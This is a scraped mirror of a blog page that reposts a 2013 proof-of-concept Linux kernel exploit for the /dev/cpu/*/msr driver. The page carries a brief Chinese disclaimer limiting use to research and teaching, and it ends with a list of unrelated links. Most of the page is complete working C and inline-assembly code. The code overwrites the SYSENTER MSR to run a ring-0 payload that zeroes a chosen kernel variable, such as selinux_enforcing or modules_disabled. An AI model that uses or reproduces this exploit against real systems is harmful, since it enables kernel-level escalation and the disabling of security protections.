zoukankan      html  css  js  c++  java

  • Linux Kernel 'MSR' Driver Local Privilege Escalation

    本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

    1. // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
    2. // can do whatever in the commented area, re-enable module support, etc
    3. // requires CONFIG_X86_MSR and just uid 0
    4. // a small race exists between the time when the MSR is written to the first
    5. // time and when we issue our sysenter
    6. // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
    7. // configured to take a hex arg of a dword pointer to set to 0
    8. // (modules_disabled, selinux_enforcing, take your pick)
    9. //
    10. // Hello to Red Hat, who has shown yet again to not care until a
    11. // public exploit is released. Not even a bugtraq entry existed in
    12. // their system until this was published -- and they have a paid team
    13. // of how many?
    14. // It's not as if I didn't mention the problem and existence of an easy
    15. // exploit multiple times prior:
    16. // https://twitter.com/grsecurity/status/298977370776432640
    17. // https://twitter.com/grsecurity/status/297365303095078912
    18. // https://twitter.com/grsecurity/status/297189488638181376
    19. // https://twitter.com/grsecurity/status/297030133628416000
    20. // https://twitter.com/grsecurity/status/297029470072745984
    21. // https://twitter.com/grsecurity/status/297028324134359041
    22. //
    23. // spender 2013
    25. #define _GNU_SOURCE
    26. #include<stdio.h>
    27. #include<sched.h>
    28. #include<unistd.h>
    29. #include<sys/types.h>
    30. #include<sys/stat.h>
    31. #include<fcntl.h>
    32. #include<stdlib.h>
    33. #include<sys/time.h>
    34. #include<sys/resource.h>
    35. #include<sys/mman.h>
    37. #define SYSENTER_EIP_MSR 0x176
    39. u_int64_t msr;
    41. unsignedlong ourstack[65536];
    43. u_int64_t payload_data[16];
    45. externvoid*_ring0;
    46. externvoid*_ring0_end;
    48. void ring0(void)
    49. {
    50. __asm volatile(".globl _ring0 "
    51. "_ring0: "
    52. ".intel_syntax noprefix "
    53. ".code64 "
    54. // set up stack pointer with 'ourstack'
    55. "mov esp, ecx "
    56. // save registers, contains the original MSR value
    57. "push rax "
    58. "push rbx "
    59. "push rcx "
    60. "push rdx "
    61. // play with the kernel here with interrupts disabled!
    62. "mov rcx, qword ptr [rbx+8] "
    63. "test rcx, rcx "
    64. "jz skip_write "
    65. "mov dword ptr [rcx], 0 "
    66. "skip_write: "
    67. // restore MSR value before returning
    68. "mov ecx, 0x176 "// SYSENTER_EIP_MSR
    69. "mov eax, dword ptr [rbx] "
    70. "mov edx, dword ptr [rbx+4] "
    71. "wrmsr "
    72. "pop rdx "
    73. "pop rcx "
    74. "pop rbx "
    75. "pop rax "
    76. "sti "
    77. "sysexit "
    78. ".code32 "
    79. ".att_syntax prefix "
    80. ".global _ring0_end "
    81. "_ring0_end: "
    82. );
    83. }
    85. unsignedlong saved_stack;
    87. int main(int argc,char*argv[])
    88. {
    89. cpu_set_tset;
    90. int msr_fd;
    91. int ret;
    92. u_int64_t new_msr;
    93. struct sched_param sched;
    94. u_int64_t resolved_addr =0ULL;
    96. if(argc ==2)
    97. resolved_addr = strtoull(argv[1], NULL,16);
    99. /* can do this without privilege */
    100. mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
    101. mlock(&payload_data,sizeof(payload_data));
    103. CPU_ZERO(&set);
    104. CPU_SET(0,&set);
    106. sched.sched_priority =99;
    108. ret = sched_setscheduler(0, SCHED_FIFO,&sched);
    109. if(ret){
    110. fprintf(stderr,"Unable to set priority. ");
    111. exit(1);
    112. }
    114. ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
    115. if(ret){
    116. fprintf(stderr,"Unable to set affinity. ");
    117. exit(1);
    118. }
    120. msr_fd = open("/dev/cpu/0/msr", O_RDWR);
    121. if(msr_fd <0){
    122. msr_fd = open("/dev/msr0", O_RDWR);
    123. if(msr_fd <0){
    124. fprintf(stderr,"Unable to open /dev/cpu/0/msr ");
    125. exit(1);
    126. }
    127. }
    128. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
    129. ret = read(msr_fd,&msr,sizeof(msr));
    130. if(ret !=sizeof(msr)){
    131. fprintf(stderr,"Unable to read /dev/cpu/0/msr ");
    132. exit(1);
    133. }
    135. // stuff some addresses in a buffer whose address we
    136. // pass to the "kernel" via register
    137. payload_data[0]= msr;
    138. payload_data[1]= resolved_addr;
    140. printf("Old SYSENTER_EIP_MSR = %016llx ", msr);
    141. fflush(stdout);
    143. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
    144. new_msr =(u_int64_t)(unsignedlong)&_ring0;
    146. printf("New SYSENTER_EIP_MSR = %016llx ", new_msr);
    147. fflush(stdout);
    149. ret = write(msr_fd,&new_msr,sizeof(new_msr));
    150. if(ret !=sizeof(new_msr)){
    151. fprintf(stderr,"Unable to modify /dev/cpu/0/msr ");
    152. exit(1);
    153. }
    155. __asm volatile(
    156. ".intel_syntax noprefix "
    157. ".code32 "
    158. "mov saved_stack, esp "
    159. "lea ecx, ourstack "
    160. "lea edx, label2 "
    161. "lea ebx, payload_data "
    162. "sysenter "
    163. "label2: "
    164. "mov esp, saved_stack "
    165. ".att_syntax prefix "
    166. );
    168. printf("Success. ");
    170. return0;
    171. }
  • 相关阅读:
    Php7安装pdo_pgsql,pgsql扩展
    Laravel 实时监听打印 SQL
    windows 下安装docker依赖boot2docker镜像默认用户和密码
    win7下安装virtual box后启动报错
    phpstorm 不能自动打开上次的历史文件
    BZOJ1001 [BeiJing2006]狼抓兔子 平面图转对偶图,最小割转最短路
    BZOJ1098 [POI2007]办公楼biu
    POJ1410 Intersection
    HDU3336 Count the string
    HDU2594 Simpsons’ Hidden Talents [KMP]
  • 原文地址:https://www.cnblogs.com/security4399/p/3239649.html
Copyright © 2011-2022 走看看